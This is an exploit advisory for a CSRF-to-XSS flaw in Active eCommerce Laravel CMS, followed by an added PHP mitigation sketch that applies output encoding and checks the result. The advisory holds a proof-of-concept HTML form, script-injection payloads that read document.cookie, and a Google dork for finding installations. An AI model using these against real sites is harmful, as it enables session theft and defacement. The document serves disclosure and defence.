# Exploit Title: Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross-Site Request Forgery (CSRF) to Cross-Site Scripting (XSS) (Authenticated)
# Date: 25/11/2021
# Exploit Author: Keyvan Hardani
# Google Dork: intext:|| WHOPPS!!!THIS IS PIRATED COPY OF ACTIVE ECOMMERCE CMS
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: up to 6.1.2
# Tested on: Windows 10, Kali Linux, Burp Suite
Steps to Reproduce:
1. Log in to the site as a customer.
2. Click the navigation bar and open "Support Ticket".
3. Search the page source for the token ( _token ) and copy its value.
4. Option 1: save the script as an HTML file, paste the _token into the token field, and hit submit.
5. Option 2: use the XSS payload </textarea><script>alert(document.domain)</script> in the Description or Subject value of the support ticket.
6. Now generate a CSRF PoC.
More info & Video:
https://github.com/Keyvanhardani/Active-eCommerce-Laravel-CMS-5.5.2-Cross-Site-request-forgery-CSRF-to-Cross-site-Scripting-XSS
Proof of Concept:
<!DOCTYPE html>
<html>
<body>
<form action="https://site.com/ecommerce/support_ticket" method="POST">
<input type="text" name="_token" value="gShF0bUHgMjfSmO7sqd5J5mSzvXJFnB0qeEmc6vD" placeholder="input the token and submit the form">
<input type="hidden" name="subject" value="test<script>alert(document.cookie)</script>">
<input type="hidden" name="details" value="test<script>alert(document.cookie)</script>">
<input type="hidden" name="attachments" class="selected-files">
<input type="submit" value="submit">
</form>
</body>
</html>
DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use it at your own risk.
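
Mitigation sketch for the payload in step 5, as an added example that is not part of the original advisory and not the vendor's code: it renders the ticket text into a textarea once without and once with output encoding, then counts the script elements an HTML parser builds from each result. The function names and the markup are hypothetical; the sample ticket text is constructed from the payload shown above.

```php
<?php
declare(strict_types=1);

// Constructed sample: ticket text as it would be stored after step 5.
$details = 'test</textarea><script>alert(document.domain)</script>';

// Unsafe rendering (hypothetical): raw interpolation, the equivalent of
// Blade's {!! $details !!}. The stored "</textarea>" closes the element
// early, so everything after it is parsed as markup.
function renderTicketUnsafe(string $details): string
{
    return '<textarea name="details">' . $details . '</textarea>';
}

// Hardened rendering: encode on output, as Blade's {{ $details }} does.
// "<", ">", "&" and both quote characters become entities, so the text
// stays inside the textarea (ENT_QUOTES also covers attribute values
// such as a subject rendered into value="...").
function renderTicketSafe(string $details): string
{
    $encoded = htmlspecialchars($details, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<textarea name="details">' . $encoded . '</textarea>';
}

// Regression check: parse the fragment and count elements with this tag name.
function countElements(string $html, string $tag): int
{
    $previous = libxml_use_internal_errors(true); // malformed input is expected
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc->getElementsByTagName($tag)->length;
}

$rendered = [
    'unsafe' => renderTicketUnsafe($details),
    'safe'   => renderTicketSafe($details),
];

foreach ($rendered as $name => $html) {
    printf("%-6s script elements: %d\n", $name, countElements($html, 'script'));
    printf("       markup: %s\n", $html);
}
```

The same check can be run against the real ticket view in a feature test: submit the payload as Subject and Description, fetch the page, and fail the build if any script element appears that the template itself did not emit.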